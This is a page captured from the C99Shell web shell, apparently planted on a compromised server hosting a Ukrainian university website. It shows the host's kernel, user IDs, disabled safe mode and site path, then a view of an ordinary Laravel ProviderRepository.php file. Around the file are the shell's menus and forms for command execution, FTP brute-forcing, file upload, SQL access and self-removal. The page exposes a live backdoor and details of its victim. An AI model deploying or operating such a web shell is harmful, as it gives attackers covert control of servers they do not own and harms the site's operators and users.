!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.22 (Debian). PHP/5.6.36 

uname -a: Linux h05.hvosting.ua 4.9.110-amd64 #3 SMP Sun Nov 4 16:27:09 UTC 2018 x86_64 

uid=1389(h33678) gid=1099(h33678) groups=1099(h33678),502(mgrsecure) 

Safe-mode: OFF (not secure)

/home/h33678/data/www/it-man.ztu.edu.ua/src/vendor/laravel/framework/src/Illuminate/Foundation/   drwxr-xr-x
Free 117.29 GB of 200.55 GB (58.48%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ProviderRepository.php (6.1 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Illuminate\Foundation;

use 
Illuminate\Filesystem\Filesystem;
use 
Illuminate\Contracts\Foundation\Application as ApplicationContract;

class 
ProviderRepository
{
    
/**
     * The application implementation.
     *
     * @var \Illuminate\Contracts\Foundation\Application
     */
    
protected $app;

    
/**
     * The filesystem instance.
     *
     * @var \Illuminate\Filesystem\Filesystem
     */
    
protected $files;

    
/**
     * The path to the manifest file.
     *
     * @var string
     */
    
protected $manifestPath;

    
/**
     * Create a new service repository instance.
     *
     * @param  \Illuminate\Contracts\Foundation\Application  $app
     * @param  \Illuminate\Filesystem\Filesystem  $files
     * @param  string  $manifestPath
     * @return void
     */
    
public function __construct(ApplicationContract $appFilesystem $files$manifestPath)
    {
        
$this->app $app;
        
$this->files $files;
        
$this->manifestPath $manifestPath;
    }

    
/**
     * Register the application service providers.
     *
     * @param  array  $providers
     * @return void
     */
    
public function load(array $providers)
    {
        
$manifest $this->loadManifest();

        
// First we will load the service manifest, which contains information on all
        // service providers registered with the application and which services it
        // provides. This is used to know which services are "deferred" loaders.
        
if ($this->shouldRecompile($manifest$providers)) {
            
$manifest $this->compileManifest($providers);
        }

        
// Next, we will register events to load the providers for each of the events
        // that it has requested. This allows the service provider to defer itself
        // while still getting automatically loaded when a certain event occurs.
        
foreach ($manifest['when'] as $provider => $events) {
            
$this->registerLoadEvents($provider$events);
        }

        
// We will go ahead and register all of the eagerly loaded providers with the
        // application so their services can be registered with the application as
        // a provided service. Then we will set the deferred service list on it.
        
foreach ($manifest['eager'] as $provider) {
            
$this->app->register($this->createProvider($provider));
        }

        
$this->app->addDeferredServices($manifest['deferred']);
    }

    
/**
     * Register the load events for the given provider.
     *
     * @param  string  $provider
     * @param  array  $events
     * @return void
     */
    
protected function registerLoadEvents($provider, array $events)
    {
        if (
count($events) < 1) {
            return;
        }

        
$app $this->app;

        
$app->make('events')->listen($events, function () use ($app$provider) {
            
$app->register($provider);
        });
    }

    
/**
     * Compile the application manifest file.
     *
     * @param  array  $providers
     * @return array
     */
    
protected function compileManifest($providers)
    {
        
// The service manifest should contain a list of all of the providers for
        // the application so we can compare it on each request to the service
        // and determine if the manifest should be recompiled or is current.
        
$manifest $this->freshManifest($providers);

        foreach (
$providers as $provider) {
            
$instance $this->createProvider($provider);

            
// When recompiling the service manifest, we will spin through each of the
            // providers and check if it's a deferred provider or not. If so we'll
            // add it's provided services to the manifest and note the provider.
            
if ($instance->isDeferred()) {
                foreach (
$instance->provides() as $service) {
                    
$manifest['deferred'][$service] = $provider;
                }

                
$manifest['when'][$provider] = $instance->when();
            }

            
// If the service providers are not deferred, we will simply add it to an
            // array of eagerly loaded providers that will get registered on every
            // request to this application instead of "lazy" loading every time.
            
else {
                
$manifest['eager'][] = $provider;
            }
        }

        return 
$this->writeManifest($manifest);
    }

    
/**
     * Create a new provider instance.
     *
     * @param  string  $provider
     * @return \Illuminate\Support\ServiceProvider
     */
    
public function createProvider($provider)
    {
        return new 
$provider($this->app);
    }

    
/**
     * Determine if the manifest should be compiled.
     *
     * @param  array  $manifest
     * @param  array  $providers
     * @return bool
     */
    
public function shouldRecompile($manifest$providers)
    {
        return 
is_null($manifest) || $manifest['providers'] != $providers;
    }

    
/**
     * Load the service provider manifest JSON file.
     *
     * @return array|null
     */
    
public function loadManifest()
    {
        
// The service manifest is a file containing a JSON representation of every
        // service provided by the application and whether its provider is using
        // deferred loading or should be eagerly loaded on each request to us.
        
if ($this->files->exists($this->manifestPath)) {
            
$manifest $this->files->getRequire($this->manifestPath);

            if (
$manifest) {
                return 
array_merge(['when' => []], $manifest);
            }
        }
    }

    
/**
     * Write the service manifest file to disk.
     *
     * @param  array  $manifest
     * @return array
     */
    
public function writeManifest($manifest)
    {
        
$this->files->put(
            
$this->manifestPath'<?php return '.var_export($manifesttrue).';'
        
);

        return 
array_merge(['when' => []], $manifest);
    }

    
/**
     * Create a fresh service manifest data structure.
     *
     * @param  array  $providers
     * @return array
     */
    
protected function freshManifest(array $providers)
    {
        return [
'providers' => $providers'eager' => [], 'deferred' => []];
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by PinoyWH1Z | C99Shell Github | Generation time: 0.0256 ]--